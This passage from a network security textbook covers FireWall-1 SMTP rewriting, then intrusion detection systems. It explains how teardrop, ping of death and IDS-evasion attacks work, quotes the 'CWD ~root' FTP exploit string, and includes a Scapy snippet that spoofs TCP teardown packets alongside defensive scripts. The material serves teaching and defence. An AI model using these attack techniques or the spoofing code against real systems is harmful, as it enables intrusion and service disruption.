From the main menu of the Security Policy-1 tab, select Manage → Resources. This will produce the Resource Management screen. If this is the first time you have run the Resource Manager, it will contain no entries. Click New and select SMTP. You should now be looking at the SMTP Definition box, as shown in Figure 7.15.

Figure 7.15: The SMTP Definition box General tab

Start by configuring the resource to handle inbound mail that has been sent to foobar.com. You could use a descriptive name, such as inbound_foobar, so that this definition will be easy to recognize once it has been added to the security policy. Within the Mail Server field, enter the IP address of the mail server to which you want to forward mail. (Use the IP address to expedite mail delivery: the firewall does not have to resolve the host name.) Within the Error Handling Server field, enter the IP address of the mail system to which you want to forward error messages. This can be the same IP address you defined in the Mail Server field.

Exception tracking defines whether you wish to log all e-mail messages that this resource processes. You also have the option of sending an alert. Finally, you have the option to select the Notify Sender On Error check box. If the resource matches an inbound mail message, but the security server is unable to deliver the message, checking this box means an error message will be returned to the original sender.

You can now configure the Match tab, as shown in Figure 7.16.

Figure 7.16: The Match tab of the SMTP Definition box

The configuration of the Match tab is pretty straightforward. Enter the text you wish this resource to match within either the Sender or the Recipient field. An asterisk (*) acts as a wildcard and will match any character string. Note that you have told the resource to match any sender, but the Recipient field within the e-mail message must end in @foobar.com. This will match all inbound mail for the foobar.com domain.

Since you are not looking to rewrite any of your e-mail headers, you are done configuring this particular resource. Simply click OK to save this entry.

You must now create entries for the domains you wish to alias. From the Resource Management screen, again click New and select SMTP. This will create a new SMTP Definition box, like the one shown in Figure 7.15. Select the General tab and give this resource a descriptive name (such as inbound_fubar). Since mail addressed to fubar.com will be delivered to the same mail system as foobar.com, enter the same Mail Server and Error Handling Server IP addresses that you used for the foobar.com entry.

Under the Match tab, you will again use an asterisk to pattern-match the Sender field, but the Recipient field will contain the entry *@fubar.com. This will allow you to pattern-match inbound e-mail addresses sent to this alternative domain name.
Since this is one of the domain names that you want to rewrite, you must modify the Action1 tab, shown in Figure 7.17.

Figure 7.17: The Action1 tab of the SMTP Definition box

The only fields you need to fill in on the Action1 tab are the fields you wish to have rewritten. Any field left blank will remain untouched. The fields on the left attempt to match text within the specified portion of the e-mail header. The fields on the right contain what this text should be changed to if a pattern match occurs.

The first Recipient field contains the character string *@fubar.com. This is the portion of the address that you want to rewrite. The right-hand Recipient field contains the character string &@foobar.com. The ampersand (&) tells the resource, "Copy the value of the asterisk in the previous field and paste it here." This allows you to maintain the same user name in your new recipient header. The remaining text simply tells the resource to replace fubar.com with foobar.com.

This completes the configuration of the SMTP resource for inbound fubar.com mail. You can click OK and return to the Resource Management screen. You also need to create an SMTP resource for bofh.com. Follow the same steps you took for the fubar.com resource, but replace the name and pattern-match information with bofh.com. Once you have finished, you can close the Resource Management screen and return to the Security Policy-1 tab in order to incorporate these resources into your security policy.

Figure 7.18 shows your SMTP resources added to a very simple security policy. Row 1 blocks all traffic that you do not want passing the firewall in either direction. Row 2 defines a very loose security policy, which allows all internal systems to access any services located on the Internet (except for those explicitly dropped in row 1).

Figure 7.18: A security policy using SMTP resources

Row 3 is the entry that includes the SMTP resources. The rule states that any system can connect to Skylar (the firewall) and attempt to deliver SMTP messages. All SMTP messages will then be processed by the three SMTP resources you created. Each resource was added to this rule by right-clicking in row 3's Service box and selecting Add With Resource → SMTP, then selecting the name of the resource, which is shown in the Resource drop-down list.

Since your mail server has full Internet access per row 2, you do not need to configure an outbound SMTP resource. The mail system should be fully capable of delivering all outbound mail directly.

Tip
A side benefit of the current rule base is that it prevents your mail systems from being used as spam relays. The firewall will only accept messages going to one of your three domains, and the internal mail system cannot be reached directly from the Internet. This means that neither of your mail systems can be used by a spammer to relay advertisements to multiple recipients.

Installing the Rules
Once you have configured the firewall to reflect your security policy, you should save your settings. You should always do a File → Save As from the Security Policy-1 tab menu in order to create a unique policy name. This will provide you with some revision control in case you later need to restore an older policy.

You now need to install this policy on the firewall in order to activate your changes.
Select Policy → Install from the Security Policy-1 tab menu. This will produce a dialog box that displays all the hosts where your firewall policy will be installed. At a minimum, you should see the object for your firewall. If you are managing multiple firewalls, or if you will be installing access control lists on specific routers, these devices should appear in this dialog box, as well. When you have verified the information, click OK to install your policy on the selected hosts.

This will bring up the Install Security Policy dialog box shown in Figure 7.19. The information in this dialog box should report that a policy script was compiled without errors and that it was installed successfully to the firewall. If no errors occurred, click Close. Your firewall should be ready for use.

Figure 7.19: The Install Security Policy dialog box

If errors were reported, look at the error messages closely. Typically, errors are due to conflicts in the rules. For example, you may have created one rule stating that a particular system has full Internet access, only to later define that the same system is not allowed to use FTP.

When you install your rule base, the firewall first checks that there are no conflicts. If you wish to verify that there are no rule conflicts before you attempt to install your rules, you can select the Policy → Verify option instead. In my experience, however, this check is not exhaustive. It is possible for a rule set to pass the Verify check, only to show problems during installation.

Summary
This completes our review of Check Point FireWall-1. In this chapter, you saw why FireWall-1 is one of the most popular firewall products and became aware of a number of caveats. You also went through the installation and setup procedure on a Windows NT server. You should now have a good idea of how to deploy this product within your network environment.

In the next chapter, we will evaluate methods of controlling security within your network perimeter. We will look at intrusion detection systems, which can be combined with a firewall solution to produce an extremely secure environment.

Chapter 8: Intrusion Detection Systems
Intrusion detection systems (IDS) are a fairly new technology that has been receiving a lot of recent press. While the technology is only three or four years old, vendors promise it will revolutionize the network security market. In fact, one vendor has ventured to say that its IDS completely removes the need for a firewall. Clearly, someone in marketing must be writing this company's technical documents, because an IDS is a way to augment—not replace—your existing security mechanisms.

The FAQs about IDS
To understand an intrusion detection system, think about having one or more network protocol experts (affectionately known as “bit weenies”) armed with a network analyzer and watching passing traffic. These specialists know about all the latest exploits that an attacker may attempt to launch, and they diligently check every packet to see if any suspicious traffic is passing on the wire. If they find suspicious traffic, they immediately contact the network administrator and inform her of their findings.

Take out the human element from this scenario, and you have an intrusion detection system.
An IDS captures all passing traffic on the network, just like a network analyzer. Once this information has been read into memory, the system compares the packets to a number of known attack patterns. For example, if the IDS notices that a particular host is repeatedly sending SYN packets to another host without ever attempting to complete the connection, the IDS would identify this as a SYN attack and take appropriate action. A good IDS may have well over 100 attack patterns saved in its database.

The action taken depends on the particular IDS you are using and how you have it configured. All IDS products are capable of logging suspicious events. Some will even save a raw packet capture of the traffic so that it can be analyzed later by the network administrator. Others can be configured to send out an alert, such as an e-mail message or a page. Many IDS products can attempt to interfere with the suspicious transmission by resetting both ends of the connection. Finally, there are a few that can interact with a firewall or router in order to modify the filter rules and block the attacking host. The benefits and drawbacks of each of these actions will be discussed in detail later in this chapter.

An IDS has traditionally been broken up into two parts:
ƒ The sensor, which is responsible for capturing and analyzing the traffic
ƒ The console, from which the sensor can be managed and all reports are run

Intrusion detection systems are extreme resource hogs. Vendors typically recommend that you run the sensor on a dedicated system with 256MB of RAM and an Intel 300MHz Pentium III or Pentium Pro processor (or the RISC equivalent if the sensor is running on UNIX). Since an IDS logs all traffic, copious amounts of disk space are required for its databases. While about 100MB of disk space is usually recommended, plan on using a whole lot more unless you will frequently purge the database or your network sees very little traffic. The requirements for the dedicated system running the console are about the same, except you must reserve enough disk space to store a copy of each sensor's database.

IDS Limitations
So far, an IDS sounds like a wonderful security device—but these systems are not perfect and do have their limitations. In fact, the authors of a popular column in the trade magazine InfoWorld declared IDS dead at the end of the year 2000, citing switched network technologies, imperfect one-size-fits-all attack signatures, high-volume traffic that overloads the IDS, and encrypted data that hides pertinent attack information from the IDS while leaving Web servers vulnerable. Many times an IDS simply cannot respond in time to prevent an attack. Let's look at a common denial of service (DoS) attack to see how this can occur.

Teardrop Attacks
In order to understand how a teardrop attack is used against a system, you must first understand the purpose of the fragmentation offset field and the length field within the IP header. A decode of an IP header is shown in Figure 8.1. The fragmentation offset field is typically used by routers. If a router receives a packet that is too large for the next segment, the router will need to fragment the data before passing it along.
The fragmentation offset field is used along with the length field so that the receiving system can reassemble the datagram in the correct order. When a fragmentation offset value of 0 is received, the receiving system assumes either that this is the first packet of fragmented information or that fragmentation has not been used.

Figure 8.1: A decode of an IP header

If fragmentation has occurred, the receiving system will use the offset to determine where the data within each packet should be placed when rebuilding the datagram. For an analogy, think of a child's set of numbered building blocks. As long as the child follows the numbering plan and puts the blocks together in the right order, he can build a house, a car, or even a plane. In fact, he does not even need to know what he is trying to build. He simply has to assemble the blocks in the specified order.

The IP fragmentation offset works in much the same manner. The offset tells the receiving system how far away from the front of the datagram the included payload should be placed. If all goes well, this scheme allows the datagram to be reassembled in the correct order. The length field is used as a verification check to insure that there is no overlap and that data has not been corrupted in transit. For example, if you place fragments 1 and 3 within the datagram and then try to place fragment 2, but you find that fragment 2 is too large and will overwrite some of fragment 3, you know you have a problem.

At this point, the system will try to realign the datagrams to see if it can make them fit. If it cannot, the receiving system will send out a request that the data be resent. Most IP stacks are capable of dealing with overlaps or payloads that are too large for their segment.

Launching a Teardrop Attack
A teardrop attack starts by sending a normal packet of data with a normal-size payload and a fragmentation offset of 0. From this initial packet of data, a teardrop attack is indistinguishable from a normal data transfer. Subsequent packets, however, have modified fragmentation offset and length fields. This ensuing traffic is responsible for crashing the target system.

When the second packet of data is received, the fragmentation offset is consulted to see where within the datagram this information should be placed. In a teardrop attack, the offset on the second packet claims that this information should be placed somewhere within the first fragment. When the payload field is checked, the receiving system finds that this data is not even large enough to extend past the end of the first fragment. In other words, this second fragment does not overlap the first fragment; it is actually fully contained inside of it. Since this was not an error condition that anyone expected, there is no routine to handle it, and this information causes a buffer overflow—crashing the receiving system. For some operating systems, only one malformed packet is required. Others will not crash unless multiple malformed packets are received.

IDS versus Teardrop
How would a typical IDS deal with this attack? When the teardrop attack is launched, the initial packet resembles a normal data transfer. From just looking at this first packet of information, an IDS has no way of knowing that an attack is about to occur.
When the second packet is transmitted, the IDS would be able to put together the datagram fragments and identify that this is a classic example of a teardrop attack. Your IDS could then alert the networking staff and take preventive measures to stop the attack.

You have only one tiny little problem: if your attacker was lucky enough to identify an operating system that will crash with only one malformed packet, it is too late to prevent the attack from occurring. While it is true that your networking staff will have the benefit of knowing that their server has just crashed, they have probably already figured that out from the number of calls from irate users.

So while your intrusion detection system was able to tell you why the server crashed, it was unable to prevent the attack from occurring in the first place. In order to prevent future occurrences, you would need to patch the system before an attacker strikes again.

Why not simply block the attacking IP address? Your attacker is probably savvy enough to use IP spoofing, making it look like the attack came from somewhere other than his or her real IP address. Unless your IDS is on the same collision domain as the attacking system, it will be unable to detect that a spoofed address is being used. This means that your attacker could continue to randomly change the source IP address and launch successful attacks.

Other Known IDS Limitations
In February 1998, Secure Networks, Inc. released a white paper about testing it had performed on a number of intrusion detection systems. This testing discovered a number of vulnerabilities in IDS products that would allow an attacker to launch an attack and go completely undetected.

While some of the conclusions of the study are a bit melodramatic, the actual testing raises some valid points. In short, the study focused on two problem areas: IDS detection of manipulated data and direct attacks on the IDS itself. The conclusion of the study was that sniffer-based intrusion detection would never be capable of reliably detecting attacks.

Data Manipulation
This conclusion was based on the fact that virtually none of the intrusion detection systems in the study reassembled IP packets in a manner identical to the systems communicating via IP. This resulted in some inconsistencies between what the IDS perceived was occurring within the packet stream and what the receiving system was able to process.

One of the problems was that some of the intrusion detection systems did not verify the checksum field within the IP header (refer to Figure 8.1). This verification would most certainly be done by the receiving system, so manipulating this field would cause the IDS to record a different payload than the receiving system would process.

The example cited in the study was the PHF CGI attack. An IDS would attempt to detect this attack by looking for the character string phf within the payload portion of all HTTP requests. If this pattern was detected, the IDS would assume that this attack was taking place. A savvy attacker could attempt to send a series of packets, each carrying one character, that together spelled the string phoof. The attacker could then manipulate the checksum field so that each packet containing the letter o had an invalid checksum.
While this inconsistency in how traffic is processed is certainly a valid concern, it is not insurmountable. For example, ISS RealSecure, one of the packages that exhibited this problem, was fixed by the next product release. Such problems are typical in an infant technology. Firewall vendors have gone through a similar learning process and continue to make improvements even today. There is no reason to assume that network security will ever become a stagnant field.

Attacks against the IDS

Another issue raised by the Secure Networks study was the vulnerability of the IDS to direct attacks. This is a valid concern, because a direct attack against the IDS may inhibit its ability to detect intrusions. By shutting down the IDS, an attacker could launch an attack against the network without fear of detection.

IDS versus Firewall

This highlights a major difference between a firewall and an IDS. A firewall acts as a perimeter guard. This means that all traffic must pass through it in order to move from one section of a network to another. If the firewall is attacked and services are disrupted, it will typically fail closed, meaning that it will be unable to pass traffic. While this disrupts all transmissions, it prevents an attacker from disabling the firewall and using this opportunity to launch an attack on an internal host.

An IDS, on the other hand, does not sit between network segments. It is designed to run unobtrusively within a single collision domain. If the IDS is disabled, it effectively fails open, because traffic flow is not disrupted. An attacker may be able to disable the IDS while still gaining access to network resources. This means that all attacks launched while the IDS is offline will go undocumented.

Again, this problem is not as insurmountable as the Secure Networks study would make it seem. There is no legitimate reason to have the intrusion detection system directly addressable by every network host. The act of sniffing network traffic does not require a valid IP address. The only systems requiring connectivity are

• The sensor
• The console
• A DNS system (if you wish to resolve IP addresses to host names)
• The firewall or router (if you wish to let the IDS modify filtering rules)

Segregating IDS communications from the public network can easily be accomplished using a separate private network along with private IP address space. In fact, it can even be done in-band, as long as routing to this subnet is disabled. While the sensor requires an IP protocol stack and thus an IP address on the main network, there is no reason why this address has to be valid. An example of this configuration is shown in Figure 8.2.

Figure 8.2: Managing IDS through a separate subnet

In Figure 8.2, your regular network systems have been assigned address space from the 10.1.1.0 subnet. All systems within this subnet are allowed some level of Internet access, and your firewall has been configured to use NAT with these addresses. As far as the firewall is concerned, only the 10.1.1.0 network exists internally.
If you look closely at the figure, you will notice that the DNS system has two IP addresses: one for the 10.1.1.0 network and one for the 192.168.1.0 network. This device has been specifically configured not to route any traffic between these two subnets. IP forwarding has been disabled: while the device is able to communicate with systems on both subnets, it is unable to act as a router and forward traffic between them.

Your IDS sensor and monitor are using address space from the 192.168.1.0 subnet. While they will be able to communicate with each other and the DNS system, they will not be able to communicate with any system using a 10.1.1.0 address. This is because there are no devices routing between the two network segments. Your IDS is also unable to send data to, or receive data from, systems outside the firewall.

What happens when your IDS sensor tries to monitor traffic? As mentioned, the IDS sensor will capture all traffic on the network, not just traffic on its own subnet. This means that it is perfectly capable of recording all traffic on the local network, including communications between systems on the 10.1.1.0 subnet and the Internet. It can then report these findings to the console via the 192.168.1.0 subnet.

What happens when either system needs to resolve an IP address to a host name? We did, after all, mention that the DNS system was incapable of routing information. While this is a true statement, it does not prohibit you from using the DNS system as a proxy in order to resolve address queries.

In Chapter 3, you saw that DNS is simply an application layer service that is responsible for translating host names to IP addresses and vice versa. When your sensor sends a DNS query to the DNS server, the server will attempt to respond to the request with information stored locally (either through local domain files or via cached entries). If this is not possible, the DNS server will attempt to contact one of the root name servers.

If the best route to the root name servers runs through the DNS server's 10.1.1.15 interface—for example, because a default route points at 10.1.1.1 on the firewall—the DNS server will transmit the request using the source IP address 10.1.1.15. The DNS server is not routing your query; it is acting as a proxy in order to resolve the query for you.

When it receives a reply to the query, the DNS server will then forward the response back to the sensor using the best route it knows. This would require the system to transmit using the 192.168.1.1 address. Again, the information is not being routed; it is being proxied by the DNS service. This means that your IDS is fully capable of resolving DNS queries without using the same subnet address as the rest of the network.

The result is a hidden subnet that is not directly addressable from the Internet. An attacker would need to penetrate the firewall and compromise the DNS server in order to gain connectivity to either the IDS sensor or console. If the IDS cannot be directly addressed, it obviously cannot be attacked from the outside.
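The one setting this whole design hinges on is IP forwarding staying off on the dual-homed DNS host. As a sanity check, here is a sketch that assumes the host runs Linux, where the kernel exposes the setting under /proc; other platforms (an NT registry value, for instance) control the same behavior elsewhere, so treat the path as an assumption.

def ip_forwarding_enabled(path="/proc/sys/net/ipv4/ip_forward"):
    # The kernel reports "1" when the host will route between interfaces.
    with open(path) as f:
        return f.read().strip() == "1"

if ip_forwarding_enabled():
    print("WARNING: this host will route between subnets!")
else:
    print("OK: forwarding is off; the IDS subnet stays hidden.")

A check like this belongs in whatever periodic audit you run against the DNS host, since a single flipped setting quietly turns the hidden subnet into a routed one.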
Tip
Just like a firewall, an IDS sensor that will be using IP on the public network should be hardened before use. This includes insuring that it has all the latest security patches installed and that the system is not running any unnecessary services. A hardened system will be far more resistant to attack—and therefore a much better platform for running a security monitoring process.

Internal Attacks against the IDS

The IDS sensor and console are still vulnerable to internal attack, however. If someone on the 10.1.1.0 network discovers the IP address of the IDS, it would be a simple matter of changing or spoofing the local address in order to address these systems directly on the 192.168.1.0 subnet. This is referred to as "security through obscurity"—the systems will only remain secure as long as no one knows where they are hidden. Still, by making these systems completely inaccessible from the Internet, you have dramatically limited the scope of potential attack origination points and simplified the process of discovering the attacker.

When internal attacks are a concern, you can go with an IDS that does not require an IP stack. For example, RealSecure supports network monitoring from a system that does not have IP bound to the monitored network. With no IP address, the system is invulnerable to any form of IP-based attack. Of course, this also means that you will have to make special considerations for the monitoring console. You will either need to run the IDS console on the same system as the sensor or install a second network card in the sensor so that it can communicate with the console through a private subnet.

IDS Countermeasures

Along with logging and alerting, an intrusion detection system has two other active countermeasures at its disposal:

• Session disruption
• Filter rule manipulation

These vary with each specific product, but let's look at the general strengths and weaknesses of each method, starting with session disruption.

Session Disruption

Session disruption is the easiest kind of countermeasure to implement. While there are some variations on its implementation, in its most basic form session disruption is produced by having the IDS reset or close each end of an attack session. This may not prevent the attacker from launching further attacks, but it does prevent the attacker from causing any further damage during the current session.

For example, let's say that your IDS sensor detects a would-be attacker attempting to send the character string CWD ~root during an FTP session. If formulated correctly, this exploit would provide the attacker with root-level FTP access on some older systems. This level of access is granted without any password authentication, and the attacker would then be able to read or write to any file on the system.

If session disruption is enabled, your IDS sensor would first identify and log this potential attack, then spoof ACK-FIN packets to both ends of the session in order to tear down the connection, in each case pretending to be the system at the other end of the connection. For example, it would transmit an ACK-FIN to the attacker using the source IP address, port numbers, and sequence numbers of the FTP server. This would effectively close the communication session, preventing the attacker from accessing the file system. Depending on the IDS sensor in use, it may then attempt to block all communications from the attacking host indefinitely or for a user-configurable period of time.
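The mechanics of that spoofed teardown are easy to sketch with the Scapy packet library—an assumption for illustration, not the tool any particular IDS uses. The addresses, ports, and sequence numbers below are hypothetical; a real sensor lifts them from the session it has been watching. Spoofing traffic requires raw-socket privileges, so run anything like this only against systems you own, in a lab.

from scapy.all import IP, TCP, send

def disrupt(src_ip, src_port, dst_ip, dst_port, seq, ack):
    # Pretend to be 'src' and close its side of the conversation.
    teardown = IP(src=src_ip, dst=dst_ip) / TCP(
        sport=src_port, dport=dst_port, flags="FA", seq=seq, ack=ack)
    send(teardown, verbose=False)

# Spoof an ACK-FIN from the FTP server (port 21) to the attacker...
disrupt("10.1.1.20", 21, "192.0.2.44", 1042, seq=100, ack=200)
# ...and one from the attacker back to the FTP server.
disrupt("192.0.2.44", 1042, "10.1.1.20", 21, seq=200, ack=100)

While session disruption is a powerful feature, it is not without its limitations.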
For example, the teardrop example given earlier in this chapter showed that the intrusion detection system would be unable to block the attack. While the IDS has enough time to react to the FTP exploit, it could never react quickly enough to save a system from teardrop if only one malformed IP header is enough to crash the system.

Filter Rule Manipulation

Some IDS sensors have the ability to modify the filter rules of a router or firewall in order to prevent continued attacks: the IDS adds a new filter rule to the firewall that blocks all inbound traffic from the suspect IP address, stopping the attacking system from transmitting additional traffic to the target host. While filter rule manipulation is a powerful feature, it is not without its limitations. You should fully understand the implications of this feature before you enable it.

On the positive side, filter rule manipulation can prevent an attack with far less network traffic than session disruption. Once the IDS modifies the filter rules, attack traffic ceases. With session disruption, the IDS must continually attempt to close every attack session. If you have a persistent attacker, this could add quite a bit of extra traffic to the wire.

On the negative side, filter rule manipulation is not always 100 percent effective. For example, what if the source IP address of the attack is inside the firewall? In this case, modifying the filter rules will have no effect. Since the attacking traffic never actually passes through the firewall, it is not subject to the filter rules. This means that a filter change will have no effect on the attack.

Also, a savvy attacker may use a spoofed IP address rather than a real one. While the firewall may begin blocking the initial attack, all the attacker has to do is select another spoofed address in order to circumvent this new rule change. With session disruption, the IDS reacts based on attack signature, not source IP address. This means that session disruption would be able to continually fend off the attack, while filter rule manipulation would not. The IDS could make successive rule changes, attempting to block each spoofed address as it is detected; if the attacker quickly varies the source IP address, however, the IDS would never be able to keep up. Remember that it takes a certain amount of time (typically 10–30 seconds) for the IDS and the firewall to complete a filter change.

Warning
The ability to perform live filter rule changes could be exploited for a DoS attack. If the attacker purposely varies the source IP address in order to trigger multiple filter rule changes, the firewall may become so busy that it stops passing traffic. Any active sessions during the filter rule change may be terminated, as well.

Clearly, the ability to modify filter rules should be used sparingly and only for attacks that would be considered extremely detrimental. For example, just about every unpatched IP device or system produced before 1996 is vulnerable to the Ping of death, an exploit that breaks the IP protocol stack on a target system by sending it an oversized ICMP datagram. If you are running an environment with many older systems that have not been patched, modifying the filter rules to block these attacks makes a lot of sense. While frequent rule changes could potentially cause a denial of service, letting this traffic onto your network most certainly would interrupt all IP communications.
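What the IDS actually does in this scenario is small: push one rule to the filtering device, and remove it when the inhibit period expires. As a stand-in for whatever firewall API your sensor speaks, here is a sketch that shells out to the Linux iptables command—an assumption chosen purely because the command is widely known; the principle (and the spoofed-address caveat above) is the same on any platform.

import subprocess

def block_source(ip: str):
    # Insert a rule that silently drops all inbound traffic from 'ip'.
    subprocess.run(
        ["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"], check=True)

def unblock_source(ip: str):
    # Remove the rule again once the inhibit period expires.
    subprocess.run(
        ["iptables", "-D", "INPUT", "-s", ip, "-j", "DROP"], check=True)

Seeing the mechanism laid bare also makes the DoS warning above easier to appreciate: each spoofed source the attacker burns through costs you another rule insertion on a device that has real traffic to pass.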
Tip
The Ping of death affects networking hardware as well as computer systems. Make sure that all of your IP devices are patched against this form of attack.

Note
Not all intrusion detection systems are compatible with all firewalls and routers. For example, ISS RealSecure can only modify Check Point FireWall-1. At the time of this writing, it is not compatible with any other firewall product, although there are plans to add Cisco routers to a future release. So, while session disruption can be used by any IDS that supports this feature, you can only use filter manipulation if you are using a compatible system that performs firewall functions.

Host-Based IDS

Until now we have focused on intrusion detection systems that run on a dedicated server and monitor all passing network traffic. These devices are used to control traffic within an entire collision domain. There are, however, host-based IDS products, which are designed to protect only a single system.

A host-based IDS functions similarly to a virus scanner. The software runs as a background process on the system you wish to protect as it attempts to detect suspicious activity. Suspicious activity can include an attempt to pass unknown commands through an HTTP request or even modification of the file system. When suspicious activity is detected, the IDS can then attempt to terminate the attacking session and send an alert to the system administrator.

Some Drawbacks

Host-based intrusion detection systems have quite a few drawbacks, which make them impractical for many environments. For starters, most can monitor only specific types of systems. For example, CyberCop Server by Network Associates is only capable of protecting Web servers. If the server is running multiple services (such as DNS, file sharing, POP3, and so on), the host-based IDS may not be able to detect an intrusion. While most do watch core server functions, such as modifications to a user's access rights, an attacker may find a way to disable the IDS before attempting any changes to the system. If the IDS becomes disabled, the attacker is free to wreak havoc on the system.

Another problem is that host-based intrusion detection systems simply run as a background process and do not have access to the core communication functionality of the system. This means that the IDS is incapable of fending off attacks against the protocol stack itself. For example, it takes 10 or more teardrop packets to crash an unpatched NT server. While this is more than ample time for a network-based IDS to react and take countermeasures, a host-based IDS would be left helpless because it would never even see this traffic.

It can also be argued that there is a logistical flaw in running your intrusion detection software on the system you wish to protect. If an attacker can infiltrate the system, the attacker may compromise the IDS, as well. This is an extremely bad thing: the attacker has just punched through your last line of security defense.

Tip
Only sloppy attackers neglect to cover their tracks by purging logs and killing suspect processes. This is why many security experts suggest that system administrators forward all log entries to a remote system. If the system is compromised by an attacker, the logs cannot be altered. This same principle should be extended to your intrusion detection systems, as well.
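The file-system side of host-based detection boils down to baselining and comparing. Here is a minimal sketch of the idea: hash the files you care about, store the baseline somewhere the attacker cannot reach (per the Tip above), and compare on a schedule. The paths are placeholders, and real products add far more context than a bare hash.

import hashlib, os

def snapshot(root):
    """Map each file under 'root' to a SHA-256 digest of its contents."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                baseline[path] = hashlib.sha256(f.read()).hexdigest()
    return baseline

def changed_files(old, new):
    # Anything added, removed, or altered since the baseline was taken.
    return [p for p in new if old.get(p) != new[p]] + \
           [p for p in old if p not in new]

# baseline = snapshot("/etc")
# ...later, on a schedule...
# for path in changed_files(baseline, snapshot("/etc")): raise_alert(path)

Note that this only catches the aftermath of an attack—it is exactly the kind of countermeasure that cannot save a host from a protocol-stack exploit like teardrop.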
When Is Host-Based IDS Effective?

Despite all these drawbacks, host-based intrusion detection systems do have their place. For example, let's assume you have a Web server you wish to protect that is located on a DMZ network segment. This DMZ is behind your firewall but in an isolated segment that contains only the Web server. The firewall is configured to allow in only HTTP traffic to the Web server.

In this situation, a host-based IDS product may be sufficient to protect the Web server, because the firewall is providing most of your protection. The firewall should insure that the only traffic allowed to reach the Web server is HTTP requests. This means that you should not have to worry about any other services being compromised on the Web server.

Your host-based intrusion detection system only has to insure that no suspect file access requests or CGI and Java exploits are included in these HTTP requests and passed along to the Web server process running on the system. While this is still no small feat, it does limit the scope of the kinds of exploits the IDS will be expected to handle.

Host-based IDS can also be extremely useful in a fully switched environment. The reasoning behind this is shown in Figure 8.3. In this figure, all systems are directly connected to a backbone switch. This, in effect, gives every system its own collision domain: the switch will isolate all unicast traffic so that only the two systems involved in the communication will see the traffic.

Figure 8.3: A network-based IDS is incapable of seeing all traffic in a fully switched environment.

Since the switch is isolating communication sessions, your network-based IDS will be unable to see all of the passing network traffic. If a workstation launches an attack against the intranet Web server, the IDS will be completely unaware that the attack is taking place and thus unable to take countermeasures. This also means that the attack would not appear in the IDS logs, so no record will be made of the event.

A host-based IDS would be in a much better position to protect the intranet Web server. Since it runs on the system you wish to protect, it is unaffected by the traffic isolation properties of the switch. It will see all the traffic that the Web server sees, so it can protect the system from HTTP-based attacks.

Tip
Most switch vendors allow you to configure one of the switch's ports as a monitoring port. This allows the switch to send a copy of all passing traffic to any system connected to this port. If you will be using a network-based IDS in a switched environment, connect it to this monitoring port in order to insure that the IDS can verify all passing traffic.

IDS Fusion

In an attempt not only to overcome the limitations of traditional IDS, but also to allow for more proactive defense, IDS research is pushing toward the integration—or, to use the more common term of military origin, the fusion—of data. By combining the packet information (the actual information being communicated) from servers and hosts with information of other types and from other sources, IDS systems can more accurately determine information about an attack. Additional data sources include:

SNMP Simple Network Management Protocol enables network devices to communicate with a centralized monitoring system and report how they are operating, not just what data is being transferred. An example would be a router that updates a network monitoring system with the amount of traffic per second passing through a given interface (which can be used by the IDS to determine if a hacker is attempting a DoS attack).

System logs Most operating systems can be configured to record an extensive amount of detail concerning their overall state at any given moment, along with the specifics from each operating system component. Consider an e-mail server that logs not just the arrival time of e-mail, but also the IP address of the originating server. This information could be used by the IDS to trace the path of worm-carrying e-mails and to tell all e-mail servers in a system to filter out any e-mail originating from the offending server.

System messages While most pertinent system data is usually logged, this is not always the case—whether through misconfiguration or simply because of an operating system weakness. The IDS uses system messages to create a greater overall picture of an entire network, which allows for combining the data (fusion) and retrieving meaning (pattern analysis) from the network's state.

Commands Most operating systems are not designed or configured to record every single command issued by all users. IDS fusion is designed to overcome just that limitation—illuminating patterns that might be missed by system logs themselves (which only report information of a direct system or security nature). An example would be a command designed to delete proprietary company information—a command that, though extremely damaging to the organization, does not violate or affect system integrity.

User behavior A corollary to monitoring user commands: normal user behavior over time creates its own patterns, and by constantly analyzing user account activity against that account's own profile, IDS systems can determine whether the account has been hijacked—before any greater violation or penetration of systems occurs. (A toy version of this idea is sketched after this list.)
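To give the behavior-profiling idea some shape, here is a deliberately tiny sketch that assumes login hour is the only feature being profiled. Production fusion engines weigh many features at once with far more sophisticated statistics; this merely flags a login far outside an account's historical pattern.

import statistics

def is_anomalous(history_hours, new_hour, threshold=3.0):
    """Flag a login whose hour sits many deviations from the norm."""
    mean = statistics.mean(history_hours)
    stdev = statistics.pstdev(history_hours) or 1.0   # avoid divide-by-zero
    return abs(new_hour - mean) / stdev > threshold

office_logins = [9, 9, 10, 8, 9, 10, 9]    # a typical 9-to-10 a.m. pattern
print(is_anomalous(office_logins, 3))      # a 3 a.m. logon -> True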
While the concept of analyzing all user, system, and network data and behavior seems straightforward enough, in reality IDS fusion is very difficult; it relies on complicated mathematical formulas and requires some intense back-end resources to operate effectively—and even then it is still highly subjective and experimental. Nonetheless, IDS fusion promises to revolutionize network defense through cooperative data-sharing and response by all networks affected by an attack.

IDS Setup

For the purpose of discussing how you would set up an IDS, we will look at Internet Security Systems (ISS) RealSecure. RealSecure is actually several separate products, consisting of:

RealSecure Console (Workgroup Manager) controls the entire RealSecure system, including all network and server sensors. It also stores the master database (used to generate reports).

RealSecure Network Sensor records all network traffic on a given segment and compares it against attack signatures.

RealSecure Server (OS) Sensor monitors system logs and interface traffic, looking for attacks directed at a particular system.
Before You Begin

For this walk-through, we will focus on the Windows NT version of RealSecure. As mentioned, you can choose to run the sensors and the console on the same system or on separate platforms (although you cannot run both the Network and Server/OS Sensors on the same platform). The factors governing this decision are cost, performance, and whether or not you operate a switched network. The RealSecure software costs the same whether you want to use one platform or two. For two platforms, however, you will obviously need to purchase two server-class systems, as well as two Windows NT server licenses.

If the system will be monitoring a low-bandwidth connection (T1 speeds or less), you will probably be better off running a single "killer" machine rather than two lower-quality computers. If you plan to monitor a network backbone or other high-traffic area, you may wish to consider purchasing two appropriately outfitted systems. Receiving and processing every packet on the wire takes a lot of CPU horsepower. RealSecure checks each packet for more than 130 different suspect conditions. Combine this with making log entries and launching countermeasures when required, and you have a very busy system.

Where to Place Your IDS

In order to decide where best to place your IDS, you must ask yourself, "Which systems do I wish to protect, and from which sources?" It's good to clarify this point up front—you may find you actually need more than one IDS sensor. You should have a solid security objective in mind before you fill out a purchase request for hardware or software.

